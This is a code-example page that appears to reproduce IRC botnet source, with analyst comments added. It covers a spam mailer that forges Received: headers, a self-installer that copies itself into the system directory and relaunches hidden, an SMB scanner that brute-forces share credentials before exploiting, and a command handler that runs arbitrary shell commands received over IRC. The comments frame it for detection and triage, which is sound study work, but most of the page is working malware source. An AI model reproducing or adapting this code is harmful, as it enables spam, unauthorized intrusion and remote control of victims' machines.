	time_t tGlobal=time(NULL); char szTimeBuf[4096];
	strftime(szTimeBuf, sizeof(szTimeBuf), "%a, %d %b %Y %H:%M:%S GMT", gmtime(&tGlobal));

	// Clear buffer
	sReqBuf.Assign("");
	// Write the fabricated Received: header matching the MTA type chosen above.
	// The id/for/Message-Id lines are only added when Hello() enabled ESMTP.
	switch(m_iMTAType) {
	case MTA_TYPE_UNKNOWN:
			sReqBuf.Append("Received: from "); sReqBuf.Append(sMailFrom.Token(0, "@").CStr()); sReqBuf.Append(" by ");
			sReqBuf.Append(sHost.CStr()); sReqBuf.Append(" with local\r\n");
			if(m_bUseSMTPExt) {
				// id 1AOkjD-0001RE-00
				sReqBuf.Append("\tid "); sReqBuf.Append(sSrcID.Mid(1)); sReqBuf.Append("\r\n");
				// for <*****@*****.**>; Tue, 25 Nov 2003 22:28:12 +0100
				sReqBuf.Append("\tfor <"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">; ");
				sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n");
				// Message-Id: <*****@*****.**>
				sReqBuf.Append("Message-Id: <"); sReqBuf.Append(sSrcID.CStr()); sReqBuf.Append("@");
				sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">\r\n");
			}
		break;
	case MTA_TYPE_EXIM:
			// Received: from xxxx by xxxxx.xxxxxxx.xxx with local (Exim 3.36 #1 (Debian))
			sReqBuf.Append("Received: from "); sReqBuf.Append(sMailFrom.Token(0, "@").CStr()); sReqBuf.Append(" by ");
			sReqBuf.Append(sHost.CStr()); sReqBuf.Append(" with local ("); sReqBuf.Append(sMTA.CStr()); sReqBuf.Append(")\r\n");
			if(m_bUseSMTPExt) {
				// id 1AOkjD-0001RE-00
				sReqBuf.Append("\tid "); sReqBuf.Append(sSrcID.Mid(1)); sReqBuf.Append("\r\n");
				// for <*****@*****.**>; Tue, 25 Nov 2003 22:28:12 +0100
				sReqBuf.Append("\tfor <"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">; ");
				sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n");
				// Message-Id: <*****@*****.**>
				sReqBuf.Append("Message-Id: <"); sReqBuf.Append(sSrcID.CStr()); sReqBuf.Append("@");
				sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">\r\n");
			}
		break;
	case MTA_TYPE_SENDMAIL:
			// Received: from xxxx by xxxx.xxxxxxx.xxx (8.12.8p1/8.12.6) with local
			// NOTE(review): sMTA was formatted as "8.x.y/8.x.z" above, so the
			// text emitted here starts "(8.8." and follows sHost without a space.
			sReqBuf.Append("Received: from "); sReqBuf.Append(sMailFrom.Token(0, "@").CStr()); sReqBuf.Append(" by ");
			sReqBuf.Append(sHost.CStr()); sReqBuf.Append("(8."); sReqBuf.Append(sMTA.CStr()); sReqBuf.Append(") with local\r\n");
			if(m_bUseSMTPExt) {
				// id 1AOkjD-0001RE-00
				sReqBuf.Append("\tid "); sReqBuf.Append(sSrcID.Mid(1)); sReqBuf.Append("\r\n");
				// for <*****@*****.**>; Tue, 25 Nov 2003 22:28:12 +0100
				sReqBuf.Append("\tfor <"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">; ");
				sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n");
				// Message-Id: <*****@*****.**>
				sReqBuf.Append("Message-Id: <"); sReqBuf.Append(sSrcID.CStr()); sReqBuf.Append("@");
				sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">\r\n");
			}
		break;
	case MTA_TYPE_QMAIL:
			// Received: (qmail 21608 invoked by alias); 17 Jul 2002 14:30:10 -0000
			sReqBuf.Append("Received: ("); sReqBuf.Append(sMTA.CStr()); sReqBuf.Append("); ");
			sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n");
		break;
	case MTA_TYPE_GAIA:
		break;
	case MTA_TYPE_MSSMTPSVC:
		break;
	case MTA_TYPE_MSEXCHANGE:
		break;
	case MTA_TYPE_HOTMAILWM:
		break;
	case MTA_TYPE_WEBMAIL:
		break;
	case MTA_TYPE_POSTFIX:
		break;
	case MTA_TYPE_SMTPD:
		break;
	case MTA_TYPE_LIST_AMIRC:
		break;
	}

	// From: xxxx <*****@*****.**>
	sReqBuf.Append("From: "); sReqBuf.Append(sMailFromFull.CStr()); sReqBuf.Append(" <");
	sReqBuf.Append(sMailFrom.CStr()); sReqBuf.Append(">\r\n");
	// To: [email protected]
	sReqBuf.Append("To: "); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append("\r\n");
	// Subject: bla
	sReqBuf.Append("Subject: "); sReqBuf.Append(sSubject.CStr()); sReqBuf.Append("\r\n");
	// Date: Tue, 25 Nov 2003 22:28:12 +0100
	sReqBuf.Append("Date: "); sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n");
	// MIME-Version: 1.0
	sReqBuf.Append("MIME-Version: 1.0\r\n");
//	if(g_cSMTPLogic.spam_htmlemail.bValue) {
		// Content-Type: text/html; charset=us-ascii
		sReqBuf.Append("Content-Type: text/html; charset=us-ascii\r\n");
//	} else {
//		// Content-Type: text/plain; charset=us-ascii
//		sReqBuf.Append("Content-Type: text/plain; charset=us-ascii\r\n");
//	}
	// NOTE(review): with the condition above commented out, this is a second,
	// unconditional copy of the same Content-Type header.
	sReqBuf.Append("Content-Type: text/html; charset=us-ascii\r\n");
	// Content-Transfer-Encoding: 7bit
	sReqBuf.Append("Content-Transfer-Encoding: 7bit\r\n");
	// 
	// <data>
	// .
//	if(g_cSMTPLogic.spam_htmlemail.bValue) {
		sReqBuf.Append("\r\n\r\n");
//	} else {
//		sReqBuf.Append("\r\n");
//	}
	// NOTE(review): second blank-line sequence; the one above is also
	// appended unconditionally.
	sReqBuf.Append("\r\n\r\n");
	sReqBuf.Append(sData.CStr()); sReqBuf.Append("\r\n.\r\n");

	// Send data
	m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength());

	// Receive reply
	if(!m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192)) {
		// Connection reset
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Connection reset!\n", this);
#endif // DBGCONSOLE
		Disconnect(); return false;
	}

	// Check if data was accepted
	if(sRecvBuf.Mid(0, 3).Compare("250")) {
		// Data not accepted
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Server rejected MAIL FROM \"%s\", RCPT TO \"%s\"!\n", this,
			sMailFrom.CStr(), sRcptTo.CStr());
#endif // DBGCONSOLE
		Disconnect(); return false;
	}

	return true;
}
示例#25
文件: smtp.cpp 项目: hazcod/botnets
/**
 * Performs the SMTP greeting on m_sServerSocket. EHLO is tried first; if the
 * reply does not start with "250", HELO is sent instead.
 *
 * Side effects: sets m_bUseSMTPExt (true after an accepted EHLO, false after
 * an accepted HELO) and calls Disconnect() on every failure path.
 *
 * Analyst note: the name announced in EHLO/HELO is
 * g_pMainCtrl->m_cIRC.m_sLocalHost, the same value Mail() writes into the
 * "by <host>" part of its Received: header, so the greeting name and the
 * fabricated trace header agree with each other.
 *
 * @return true if either greeting was accepted; false if a Recv() reported
 *         failure or both greetings were rejected
 */
bool CSMTP_Connection::Hello() {
	CString sReqBuf; CString sRecvBuf; CString sHost;

	// Get local hostname
	sHost.Assign(g_pMainCtrl->m_cIRC.m_sLocalHost.CStr());
	
	// Send EHLO command
	sReqBuf.Format("EHLO %s\r\n", sHost.CStr());
	m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength());

	// Receive reply
	if(!m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192)) {
		// Connection reset
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Connection reset!\n", this);
#endif // DBGCONSOLE
		Disconnect(); return false;
	}

	// Check if EHLO was accepted
	// (Compare() is non-zero when the first three characters are not "250")
	if(sRecvBuf.Mid(0, 3).Compare("250")) {
		// EHLO not accepted, try HELO (no ESMTP)
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Server rejected EHLO, disabling SMTP extensions!\n", this);
#endif // DBGCONSOLE

		// Send HELO command
		sReqBuf.Format("HELO %s\r\n", sHost.CStr());
		m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength());

		// Receive reply
		if(!m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192)) {
			// Connection reset
#ifdef DBGCONSOLE
			g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
				"Connection reset!\n", this);
#endif // DBGCONSOLE
			Disconnect(); return false;
		}

		// Check if HELO was accepted
		if(sRecvBuf.Mid(0, 3).Compare("250")) {
			// HELO not accepted
#ifdef DBGCONSOLE
			g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
				"Server rejected HELO!\n", this);
#endif // DBGCONSOLE
			Disconnect(); return false;
		}

		// HELO accepted, disable ESMTP and return true
		m_bUseSMTPExt=false; return true;
	}

#ifdef DBGCONSOLE
	g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
		"Enabled SMTP extensions!\n", this);
#endif // DBGCONSOLE

	// EHLO accepted, enable ESMTP and return true
	m_bUseSMTPExt=true; return true;
}
示例#26
/**
 * Copies the running executable to the "system directory" under the name
 * sFilename and restarts from that copy.
 *
 * Steps visible in the code:
 *  1. Resolve the target directory: GetSystemDirectory() on WIN32; otherwise
 *     /tmp when getuid() is non-zero and /usr/sbin when it is zero. The result
 *     is stored in m_sSysDir.
 *  2. On WIN32, look up RegisterServiceProcess and the Toolhelp32 functions in
 *     kernel32.dll with GetProcAddress and, if the first one is present, call
 *     RegisterServiceProcess(0, 1).
 *  3. Unless the update or service option is set, poll GetCopies(sFilename)
 *     once per second for up to 60 s and exit(1) if it never drops below 2.
 *  4. If the path test on cfilename passes, copy the image to
 *     <sysdir><DIRCHAR><sFilename>: CopyFile retried for up to 25 s on WIN32,
 *     "cp" through system() elsewhere.
 *  5. In non-_DEBUG builds start the copy, optionally with
 *     -meltserver "<original path>", and exit(0) (on WIN32 only when
 *     CreateProcess succeeds).
 *
 * Analyst notes -- host artifacts this leaves for detection and triage:
 *  - an executable newly written into the system directory (or /tmp,
 *    /usr/sbin) by a process that is not an installer;
 *  - a child process created with DETACHED_PROCESS whose image is that new
 *    file and whose command line may contain -meltserver and the path of the
 *    original file (what the new process does with that argument is not
 *    visible here);
 *  - the hard-coded file name "winhlpp32.exe" in the path test;
 *  - on non-Windows builds, a shell "cp" followed by a backgrounded launch
 *    with output redirected to /dev/null.
 *
 * @param sFilename file name to install as inside the system directory
 * @return true whenever the function returns; the relaunch paths end the
 *         process with exit() instead
 */
bool CInstaller::CopyToSysDir(CString &sFilename)
{
	char tstr[MAX_PATH];
#ifdef WIN32
	CString sysdir; GetSystemDirectory(sysdir.GetBuffer(MAX_PATH), MAX_PATH);
	m_sSysDir.Assign(sysdir.CStr());
	CString cfilename; GetModuleFileName(GetModuleHandle(NULL), cfilename.GetBuffer(MAX_PATH), MAX_PATH);

	// Resolved at run time, so these APIs do not appear in the import table.
	HINSTANCE kernel32_dll=LoadLibrary("kernel32.dll");
	if(kernel32_dll)
	{	fRegisterServiceProcess=(RSP)GetProcAddress(kernel32_dll, "RegisterServiceProcess");
		fCreateToolhelp32Snapshot=(CT32S)GetProcAddress(kernel32_dll, "CreateToolhelp32Snapshot");
		fProcess32First=(P32F)GetProcAddress(kernel32_dll, "Process32First");
		fProcess32Next=(P32N)GetProcAddress(kernel32_dll, "Process32Next");
		if(fRegisterServiceProcess) fRegisterServiceProcess(0, 1); }
#else
	if(getuid()) {
		// We aren't root, use /tmp
		m_sSysDir.Assign("/tmp");
	} else {
		// We are root, use /usr/sbin
		m_sSysDir.Assign("/usr/sbin"); }
		
	CString sysdir(m_sSysDir);
	CString cfilename(g_pMainCtrl->m_sArgv0);
#endif // WIN32

#ifdef DBGCONSOLE
	g_cConsDbg.Log(5, "Checking for multiple copies...\n");
#endif // DBGCONSOLE
	// Single-instance guard: wait up to 60 s for GetCopies() to report fewer
	// than two copies, otherwise give up and exit.
	if(!g_pMainCtrl->m_cCmdLine.m_cConfig.bUpdate && !g_pMainCtrl->m_cCmdLine.m_cConfig.bService)
	{
		unsigned long lStartTime=GetTickCount(); bool bFound=true;
		while((GetTickCount()-lStartTime) < 60000 && bFound)
		{	if(GetCopies(sFilename)<2) bFound=false; Sleep(1000);
		}
		if(bFound) {
#ifdef DBGCONSOLE
			g_cConsDbg.Log(5, "Found 2 copies, exiting...\n");
#endif // DBGCONSOLE
			exit(1); }
	}

#ifdef DBGCONSOLE
	g_cConsDbg.Log(5, "First copy running...\n");
#endif // DBGCONSOLE
	long lTimeoutStart;

	// NOTE(review): the meaning of CString::Find()'s return value is not visible
	// here, so the exact conditions of the next two tests cannot be confirmed.
	if(!cfilename.Find(sFilename.CStr(), 0))
		if(g_pMainCtrl->m_cCmdLine.m_cConfig.bUpdate)
			KillProcess(sFilename.CStr());

	if(!cfilename.Find(sysdir, 0) || cfilename.Find("winhlpp32.exe", 0))
#ifdef LINUX
	if(!cfilename.Find(sFilename, 0))
#endif // LINUX
	{	// NOTE(review): unbounded sprintf into a MAX_PATH buffer.
		sprintf(tstr, "%s%c%s", sysdir.CStr(), DIRCHAR, sFilename.CStr());

		lTimeoutStart=GetTickCount();

#ifdef DBGCONSOLE
		g_cConsDbg.Log(5, "Trying to copy to system directory...\n");
#endif // DBGCONSOLE

		// FIXME::BAD!!!
		// NOTE(review): every path below ends in the same
		// CopyFile(cfilename, tstr, false) retry loop (25 s limit, 2 s steps).
#ifdef WIN32
		if(g_pMainCtrl->m_pBot->inst_polymorph.bValue) {
			// Polymorph here
			CPolymorph cPoly; if(!cPoly.DoPolymorph(cfilename, tstr))
			{	// Fall back to copying if this didnt work
				while(CopyFile(cfilename, tstr, false)==false &&
					GetTickCount()-lTimeoutStart < 25000) Sleep(2000);
			} else {
				while(CopyFile(cfilename, tstr, false)==false &&
					GetTickCount()-lTimeoutStart < 25000) Sleep(2000);
			}
		} else {
			// Without Polymorph
			while(CopyFile(cfilename, tstr, false)==false &&
				GetTickCount()-lTimeoutStart < 25000) Sleep(2000);
		}
#else
		// NOTE(review): two paths plus "cp " are formatted into a MAX_PATH
		// buffer without a bound, and the paths reach the shell unquoted.
		char szCmdBuf[MAX_PATH]; sprintf(szCmdBuf, "cp %s %s", cfilename.CStr(), tstr);
		system(szCmdBuf);
#endif // WIN32

#ifdef DBGCONSOLE
		g_cConsDbg.Log(5, "Finished copying to system directory...\n");
#endif // DBGCONSOLE

#ifndef _DEBUG

#ifdef DBGCONSOLE
		g_cConsDbg.Log(5, "Starting new process...\n");
#endif // DBGCONSOLE

		// NOTE(review): strncat's third argument is the maximum number of
		// characters to append, not the size of the destination, so these calls
		// are not limited to the space left in tstr.
		if(g_pMainCtrl->m_pBot->bot_meltserver.bValue) {
			strncat(tstr, " -meltserver \"", sizeof(tstr));
			strncat(tstr, cfilename.CStr(), sizeof(tstr));
			strncat(tstr, "\"", sizeof(tstr));
		}

#ifdef WIN32
		PROCESS_INFORMATION pinfo; STARTUPINFO sinfo;
		memset(&sinfo, 0, sizeof(STARTUPINFO));
		sinfo.cb = sizeof(sinfo); sinfo.wShowWindow = SW_HIDE;
		// The installed copy is started detached; this instance then exits.
		if(CreateProcess(NULL, tstr, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo)) {
			exit(0); }
#else 
		sprintf(szCmdBuf, "%s 2>&1 > /dev/null 2>&1 &", tstr);
		system(szCmdBuf);
		exit(0);
#endif // WIN32

#endif // _DEBUG
	}
	return true;
}
示例#27
/**
 * Probes one host for SMB/NetBIOS and, if TCP 445 or 139 answers, runs a
 * share and credential guessing pass against it.
 *
 * What the visible code does:
 *  1. ScanPort() on 445, then 139; nothing else happens if both fail.
 *  2. Announces the scan through the IRC connection (SendFormat).
 *  3. Builds the UNC names for the host and its IPC$ resource, calls
 *     NullSession() and, when that succeeds, fills m_lUsers / m_lShares via
 *     GetUsers() / GetShares().
 *  4. Appends every entry of the built-in names[] and shares[] arrays
 *     (defined elsewhere) to those lists.
 *  5. For each share and each user, calls AuthSession() with an empty
 *     password, with the user name as password, and with each entry of
 *     pwds[]; after a successful AuthSession() it calls Exploit(). The loops
 *     stop when Exploit() returns true or m_pScanner->m_bScanning is cleared.
 *  6. Frees all list entries.
 *
 * NullSession, AuthSession, Exploit, GetUsers and GetShares are not visible
 * here; the descriptions above rely on how their results are used.
 *
 * Analyst notes: on the probed host this would be expected to appear as an
 * anonymous IPC$ connection followed by a run of logon attempts for many
 * account names from one source address within a short time. Restricting
 * anonymous enumeration, account lockout, non-guessable passwords and
 * filtering 139/445 from untrusted networks all cut this loop short.
 *
 * @param sHost address of the host to probe, as text
 */
void CScannerNetBios::StartScan(const CString &sHost)
{	if(ScanPort(sHost.CStr(), 445) || ScanPort(sHost.CStr(), 139))
	{	g_cMainCtrl.m_cIRC.SendFormat(m_bSilent, m_bNotice, m_sReplyTo.Str(), "%s: scanning ip %s.", m_sScannerName.CStr(), sHost.CStr());

		// NOTE(review): wcscpy/wcscat into the member buffers are unbounded;
		// the sizes of m_wszServer and m_wszResource are not visible here.
		MultiByteToWideChar(CP_ACP, 0, sHost.CStr(), sHost.GetLength()+1, m_wszHost, (int)sizeof(m_wszHost)/(int)sizeof(m_wszHost[0]));
		wcscpy(m_wszServer, L"\\\\"); wcscat(m_wszServer, m_wszHost);
		wcscpy(m_wszResource, m_wszServer); wcscat(m_wszResource, L"\\IPC$");

		int iNameCount=0, iShareCount=0; m_lUsers.clear(); m_lShares.clear();

		// Enumeration is only attempted when the anonymous session is accepted.
		CloseSession();
		if(NullSession()) { GetUsers(&m_lUsers); GetShares(&m_lShares); CloseSession(); }

		// Add the built-in account names (names[] ends with a null entry).
		while(names[iNameCount])
		{	userinfo *pUser=new userinfo;
			pUser->sName.Assign(names[iNameCount]);
			pUser->sServer.Assign(sHost);
			m_lUsers.push_back(pUser);
			iNameCount++; }
		
		// Add the built-in share names (shares[] ends with a null entry).
		while(shares[iShareCount])
		{	shareinfo *pShare=new shareinfo;
			pShare->sName.Assign(shares[iShareCount]);
			pShare->sRemark.Assign("default");
			m_lShares.push_back(pShare);
			iShareCount++; }
		
		bool bExploited=false;
		
		list<shareinfo*>::iterator iShares; iShares=m_lShares.begin();
		list<userinfo*>::iterator iUsers; iUsers=m_lUsers.begin();
		// Outer loop: shares; inner loop: users. Both stop on the first
		// Exploit() success or when scanning is switched off.
		while(iShares!=m_lShares.end() && !bExploited && m_pScanner->m_bScanning)
		{	while(iUsers!=m_lUsers.end() && !bExploited && m_pScanner->m_bScanning)
			{	WCHAR wszShare[MAX_PATH];
				wcscpy(m_wszServer, L"\\\\"); wcscat(m_wszServer, m_wszHost);
				wcscpy(m_wszResource, m_wszServer); wcscat(m_wszResource, L"\\");
				MultiByteToWideChar(CP_ACP, 0, (*iShares)->sName, (*iShares)->sName.GetLength()+1, wszShare, (int)sizeof(wszShare)/(int)sizeof(wszShare[0]));
				wcscat(m_wszResource, wszShare);

				// Attempt 1: empty password.
				if(AuthSession((*iUsers)->sName.CStr(), "") && !bExploited)
				{	bExploited=Exploit((*iShares)->sName.CStr(), sHost.CStr(), (*iUsers)->sName.CStr(), "");
					CloseSession(); }

				// Attempt 2: password equal to the user name.
				if(AuthSession((*iUsers)->sName.CStr(), (*iUsers)->sName.CStr()) && !bExploited)
				{	bExploited=Exploit((*iShares)->sName.CStr(), sHost.CStr(), (*iUsers)->sName.CStr(), (*iUsers)->sName.CStr());
					CloseSession(); }

				// Attempt 3..n: each entry of the built-in pwds[] list.
				int pwd_count=0; while(pwds[pwd_count] && !bExploited)
				{	if(AuthSession((*iUsers)->sName.CStr(), pwds[pwd_count]) && !bExploited)
					{	bExploited=Exploit((*iShares)->sName.CStr(), sHost.CStr(), (*iUsers)->sName.CStr(), pwds[pwd_count]);
						CloseSession(); }
					pwd_count++; }

				iUsers++; }
			iShares++; iUsers=m_lUsers.begin(); }

		// Release the heap-allocated list entries created above.
		for(iUsers=m_lUsers.begin(); iUsers!=m_lUsers.end(); ++iUsers) delete (*iUsers);
		for(iShares=m_lShares.begin(); iShares!=m_lShares.end(); ++iShares) delete (*iShares);
		m_lUsers.clear(); m_lShares.clear();
	}
}
示例#28
/**
 * Dispatches one parsed control message. pMsg->sCmd is compared against the
 * registered command names (m_cmdId, m_cmdExecute, ...) in an if/else-if
 * chain; arguments are taken from pMsg->sChatString by space-separated token.
 *
 * Branches visible here: id, execute, remove, about, flush DNS, open, quit,
 * dns, random nick, command, sysinfo, nick, long uptime, secure. A branch that
 * does not return explicitly falls through to the final "return false".
 *
 * Analyst notes -- behaviour a defender can look for on an affected host:
 *  - "execute" and "command" start processes from text received over the
 *    control channel (CreateProcess with DETACHED_PROCESS, and system()), and
 *    "open" passes received text to ShellExecute, so child processes of this
 *    binary with arbitrary command lines are expected.
 *  - "remove" deletes the autostart registry value and the service (when those
 *    options are enabled) and calls Uninstall().
 *  - "secure" sets a value under HKLM\Software\Microsoft\OLE, deletes several
 *    values from another HKLM key, kills processes and deletes files in the
 *    system directory, and runs "net share c$ /delete /y", "d$", "ipc$" and
 *    "admin$". The key path, value names and file names are produced by dp()
 *    from obfuscated number lists and are not readable on this page.
 *  - The NICK-style branches change the IRC nickname through SendRawFormat.
 *
 * @param pMsg parsed message: command name, full chat string, reply target
 *             and the silent/notice flags used for replies
 * @return the SendMsg() result or true for handled commands as coded per
 *         branch; false for unknown commands, failed execution and the
 *         fall-through cases
 */
bool CBot::HandleCommand(CMessage *pMsg)
{	
	// ID
	if(!pMsg->sCmd.Compare(m_cmdId.sName.CStr())) {
		return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bot_id.sValue.Str(), pMsg->sReplyTo.Str()); 
	}

	// Execute
	// Token 1 equal to 1 requests a visible window; the text from token 2 on is
	// used as the command line (the third Token() argument presumably means
	// "rest of line" -- not visible here).
	else if(!pMsg->sCmd.Compare(m_cmdExecute.sName.CStr()))
	{
		CString sText(pMsg->sChatString.Token(2, " ", true)); bool bVisible=atoi(pMsg->sChatString.Token(1, " ").CStr())==1;
		#ifdef WIN32
			CString sTextExp; ExpandEnvironmentStrings(sText.CStr(), sTextExp.GetBuffer(8192), 8192); // interpret environment variables
			sText.Assign(sTextExp); 
			PROCESS_INFORMATION pinfo; 
			STARTUPINFO sinfo;
			memset(&sinfo, 0, sizeof(STARTUPINFO)); 
			sinfo.cb=sizeof(sinfo);
			if(bVisible) sinfo.wShowWindow=SW_SHOW; else sinfo.wShowWindow=SW_HIDE;
			if(!CreateProcess(NULL, sText.Str(), NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo)) {
			g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "exec.error", pMsg->sReplyTo.Str()); return false; }
		#endif
		return true; 
	}

	// Remove Bot
	// Only acts when token 1 matches this instance's current user name; removes
	// the persistence entries that are enabled, then stops both main loops.
	else if(!pMsg->sCmd.Compare(m_cmdRemove.sName.Str())) 
	{
		CString sNick(pMsg->sChatString.Token(1, " ", true));
		if (!sNick.Compare(g_cMainCtrl.m_sUserName.CStr())) {
			if(g_cMainCtrl.m_cBot.as_enabled.bValue)
				g_cMainCtrl.m_cInstaller.RegStartDel(g_cMainCtrl.m_cBot.as_valname.sValue);
			if(g_cMainCtrl.m_cBot.as_service.bValue)
				g_cMainCtrl.m_cInstaller.ServiceDel(g_cMainCtrl.m_cBot.as_service_name.sValue);
			g_cMainCtrl.m_cInstaller.Uninstall();
			g_cMainCtrl.m_cIRC.m_bRunning=false;
			g_cMainCtrl.m_bRunning=false; 
		}
	}

	// About
	else if(!pMsg->sCmd.Compare(m_cmdAbout.sName.CStr())) {
		return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, g_cMainCtrl.m_sNameVerStr.Str(), pMsg->sReplyTo.Str()); 
	}

	
	// Flush DNS
	else if(!pMsg->sCmd.Compare(m_cmdFlushDNS.sName.CStr())) 
	{
		#ifdef WIN32
			// ipconfig.exe /flushdns
			// (both strings are passed through dp(), so they do not appear as
			// plain text in the binary)
			Execute(dp(9,16,3,15,14,6,9,7,78,5,24,5,0).CStr(), dp(80,6,12,21,19,8,4,14,19,0).CStr());
		#endif
		return true; 
	}

	// Open File
	// Token 1 is handed to ShellExecute with the "open" verb; the reply sent
	// back is the ShellExecute result cast to a single char.
	else if(!pMsg->sCmd.Compare(m_cmdOpen.sName.CStr())) 
	{
		CString sText; 
		sText=pMsg->sChatString.Token(1, " ").CStr(); 
		CString bRet;

		bRet=(char)ShellExecute(
			NULL, 
			"open", 
			sText.CStr(), 
			NULL,
			NULL,
			SW_SHOWNORMAL
		);

	//	bRet=system(sText.CStr())>0;
	//	if(bRet) return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "file opened.", pMsg->sReplyTo.Str());
		//else return 
		g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bRet.Str(), pMsg->sReplyTo.Str()); 
	}

	// Quit
	else if(!pMsg->sCmd.Compare(m_cmdQuit.sName.CStr())) 
	{
		g_cMainCtrl.m_cIRC.m_bRunning=false; 
		return true; 
	}

	// DNS
	// Token 1 is treated as a dotted IPv4 address if inet_addr() accepts it
	// (reverse lookup), otherwise as a host name (forward lookup).
	else if(!pMsg->sCmd.Compare(m_cmdDns.sName.CStr())) 
	{
		CString sReply; 
		hostent *pHostent=NULL; 
		in_addr iaddr;
		if(!pMsg->sChatString.Token(1, " ").Compare("")) return false;
		unsigned long addr=inet_addr(pMsg->sChatString.Token(1, " ").CStr());
		if(addr!=INADDR_NONE) {
			pHostent=gethostbyaddr((char*)&addr, sizeof(struct in_addr), AF_INET);
			if(pHostent) {
				sReply.Format("%s resolved %s", pMsg->sChatString.Token(1, " ").CStr(), pHostent->h_name);
				return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); 
			}
		} else {
			pHostent=gethostbyname(pMsg->sChatString.Token(1, " ").CStr());
			if(pHostent) {
				iaddr=*((in_addr*)*pHostent->h_addr_list);
				sReply.Format("%s -> %s", pMsg->sChatString.Token(1, " ").CStr(), inet_ntoa(iaddr));
				return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); 
			} 
		}
		if(!pHostent) {
			sReply.Format("resolve.error %s.", pMsg->sChatString.Token(1, " ").CStr());
			return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); 
		} 
	}

	// Random Nickname
	// Sends a raw IRC line whose verb comes from dp() and records the first 32
	// characters of the new nick as the current user name.
	else if(!pMsg->sCmd.Compare(m_cmdRndNick.sName.CStr())) 
	{
		CString sRndNick=RndNick(si_nickprefix.sValue.CStr());
		g_cMainCtrl.m_cIRC.SendRawFormat("%s %s\r\n", dp(40,35,29,37,0).CStr(), sRndNick.CStr());
		g_cMainCtrl.m_sUserName.Format("%s", sRndNick.Mid(0, 32).CStr());
		return true; 
	}

	// Run Command
	// Everything after the command name is passed to system(), i.e. to the
	// command interpreter. Both outcomes inside the WIN32 block return false
	// after sending their reply.
	else if(!pMsg->sCmd.Compare(m_cmdCommand.sName.CStr())) 
	{	
		#ifdef WIN32
			if(!(pMsg->sChatString.GetLength() > (pMsg->sCmd.GetLength()+pMsg->sChatString.Token(1, " ").GetLength()+3))) return false;
			CString sText; sText.Assign(&pMsg->sChatString[pMsg->sCmd.GetLength()+2]); 
			bool bRet=false;
			CString sReplyBuf; 
			sReplyBuf.Format("Executed: %s.", sText.CStr());
			if(system(sText.CStr())==-1) 
			{ 
				g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "exec.error", pMsg->sReplyTo.Str()); return false; 
			} else { 
				g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReplyBuf.Str(), pMsg->sReplyTo.Str()); return false; 
			}
		#endif
		return true; 
	}

	// System Information
	else if(!pMsg->sCmd.Compare(m_cmdSysInfo.sName.CStr())) 
	{
		return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, SysInfo().Str(), pMsg->sReplyTo.Str()); 
	}

	// Find Files
	//else if(!pMsg->sCmd.Compare(m_cmdFindFiles.sName.CStr())) 
//	{
	/*	CString strMask = pMsg->sChatString.Token(1, " ");
		CString strDir  = pMsg->sChatString.Token(2, " ");
		return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, FindFiles(strMask, strDir), pMsg->sReplyTo.Str()); 
	*/
	//}

	// Change Nickname
	else if(!pMsg->sCmd.Compare(m_cmdNick.sName.CStr())) 
	{
		g_cMainCtrl.m_sUserName.Format("%s", pMsg->sChatString.Token(1, " ", true).Mid(0, 32).CStr());
		g_cMainCtrl.m_cIRC.SendRawFormat("%s %s\r\n", dp(40,35,29,37,0).CStr(), g_cMainCtrl.m_sUserName.CStr());
		return true; 
	}

	// Uptime check (default: 7d)
	// Replies only when LongUptime() returns a non-empty string.
